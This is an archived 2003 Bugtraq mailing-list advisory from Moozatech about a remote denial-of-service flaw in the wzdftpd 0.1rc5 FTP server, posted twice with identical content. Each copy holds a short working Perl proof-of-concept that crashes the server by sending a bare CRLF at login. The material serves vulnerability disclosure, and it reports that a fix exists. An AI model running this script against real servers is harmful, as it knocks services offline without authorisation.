10733449 2003-09-23 08:33 -0700 /142 rader/ Moran Zavdi <Security@moozatech.com>
Importerad: 2003-09-23 21:46 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vuln-dev@securityfocus.com
Extern kopiemottagare: security@moozatech.com
Mottagare: Bugtraq (import) <29154>
Ärende: Moozatech: WZFTPD Denial Of Service
------------------------------------------------------------
From: "Moran Zavdi" <Security@moozatech.com>
To: <bugtraq@securityfocus.com>, <vuln-dev@securityfocus.com>
Cc: <security@moozatech.com>
Message-ID: <BFEMLHLCLNNELPCEGGJFIEFICBAA.Security@moozatech.com>
23/09/03
Moozatech Advisory http://www.moozatech.com/mt-23-09-2003.txt
-------------------------------------------------------
Application: wzdftpd FTP Server
Web Site: http://www.wzdftpd.net
Versions: 0.1rc5
Platform: Windows 2000,WindowsXP,UNIX systems might also be affected.
Risk: Remote DOS.
Severity: Medium
Fix Available: Yes
-------------------------------------------------------
1) Introduction
2) Bug
3) The Code
4) Fix
5) About Moozatech
6) Disclaimer
7) FeedBack
===============
1) Introduction
===============
wzdftpd is a ftp server designed to be modular, work under
linux/win32/freebsd/openbsd,
and to be entirely configurable online using SITE commands.
======
2) Bug
======
wzdftpd has an internal check during the login process to verify the
input. however, sending a single CRLF sequence at login will cause
an Unhandled exception at the server.
====================
3) Proof of concept.
====================
#!/usr/bin/perl
#
# ####################################
# # Proof of concept for #
# # WZDFTPD FTP Server version 0.1rc5 #
# ####################################
#
# http://www.moozatech.com/mt-23-09-2003.txt
#
# Usage: perl mooza1.pl [host] [port]
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
print "\n#####################################\n\n";
print "Proof-Of-Concept for wzdftpd v0.1rc5.\n";
print "this code is for demonstration only.\n";
print "Use it under your own responsebility.\n";
print "\n#####################################\n\n";
if (defined $host && defined $port ) {
} else {
print "Oops, Something is missing.\n";
die "Usage: perl mooza1.pl [host] [port]\n";
}
print "Connecting to $host:$port... ";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "tcp", Type=> SOCK_STREAM) or die "Failed, Cant connect?\n";
print "OK\n";
sleep 1;
print "Sending Dos..\n";
sleep 2;
print $socket "\r\n";
$socket->autoflush(1);
sleep 2;
print "we are done here..\n\n";
close($socket);
======
4) Fix
======
the author has confirmed this bug as critical and issued a fix at the
CVS version and its also availble on the daily version.
==================
5) About Moozatech
==================
Moozatech IT Systems Ltd. (Moozatech) is a leading
information security consulting and project management firm focused
on developing "Secure IT Solutions" which best suit the client's
operational needs. Moozatech devotes time to make a secure computing
environment for customers.
=============
6) Disclaimer
=============
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this
information. In no event shall the author be liable for any damages
whatsoever arising out of or in connection with the use or spread of
this information. Any use of this information is at the user's own
risk.
=============
7) FeedBack
=============
Please send suggestions, updates, and comments to:
Security@moozatech.com
http://www.moozatech.com
-----
Moran Zavdi
Moozatech IT Systems
www.moozatech.com
(10733449) /Moran Zavdi <Security@moozatech.com>/(Ombruten)
Bilaga (text/plain) i text 10733450
10733450 2003-09-23 08:33 -0700 /126 rader/ Moran Zavdi <Security@moozatech.com>
Bilagans filnamn: "mt-23-09-2003.txt"
Importerad: 2003-09-23 21:46 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vuln-dev@securityfocus.com
Extern kopiemottagare: security@moozatech.com
Mottagare: Bugtraq (import) <29155>
Bilaga (text/plain) till text 10733449
Ärende: Bilaga (mt-23-09-2003.txt) till: Moozatech: WZFTPD Denial Of Service
------------------------------------------------------------
23/09/03
Moozatech Advisory http://www.moozatech.com/mt-23-09-2003.txt
-------------------------------------------------------
Application: wzdftpd FTP Server
Web Site: http://www.wzdftpd.net
Versions: 0.1rc5
Platform: Windows 2000,WindowsXP,UNIX systems might also be affected.
Risk: Remote DOS.
Severity: Medium
Fix Available: Yes
-------------------------------------------------------
1) Introduction
2) Bug
3) The Code
4) Fix
5) About Moozatech
6) Disclaimer
7) FeedBack
===============
1) Introduction
===============
wzdftpd is a ftp server designed to be modular, work under
linux/win32/freebsd/openbsd, and to be entirely configurable online
using SITE commands.
======
2) Bug
======
wzdftpd has an internal check during the login process to verify the
input. however, sending a single CRLF sequence at login will cause
an Unhandled exception at the server.
====================
3) Proof of concept.
====================
#!/usr/bin/perl
#
# ####################################
# # Proof of concept for #
# # WZDFTPD FTP Server version 0.1rc5 #
# ####################################
#
# http://www.moozatech.com/mt-23-09-2003.txt
#
# Usage: perl mooza1.pl [host] [port]
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
print "\n#####################################\n\n";
print "Proof-Of-Concept for wzdftpd v0.1rc5.\n";
print "this code is for demonstration only.\n";
print "Use it under your own responsebility.\n";
print "\n#####################################\n\n";
if (defined $host && defined $port ) {
} else {
print "Oops, Something is missing.\n";
die "Usage: perl mooza1.pl [host] [port]\n";
}
print "Connecting to $host:$port... ";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "tcp", Type=> SOCK_STREAM) or die "Failed, Cant connect?\n";
print "OK\n";
sleep 1;
print "Sending Dos..\n";
sleep 2;
print $socket "\r\n";
$socket->autoflush(1);
sleep 2;
print "we are done here..\n\n";
close($socket);
======
4) Fix
======
the author has confirmed this bug as critical and issued a fix at the
CVS version and its also availble on the daily version.
==================
5) About Moozatech
==================
Moozatech IT Systems Ltd. (Moozatech) is a leading
information security consulting and project management firm focused
on developing "Secure IT Solutions" which best suit the client's
operational needs. Moozatech devotes time to make a secure computing
environment for customers.
=============
6) Disclaimer
=============
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this
information. In no event shall the author be liable for any damages
whatsoever arising out of or in connection with the use or spread of
this information. Any use of this information is at the user's own
risk.
=============
7) FeedBack
=============
Please send suggestions, updates, and comments to:
Security@moozatech.com
http://www.moozatech.com
(10733450) /Moran Zavdi <Security@moozatech.com>/(Ombruten)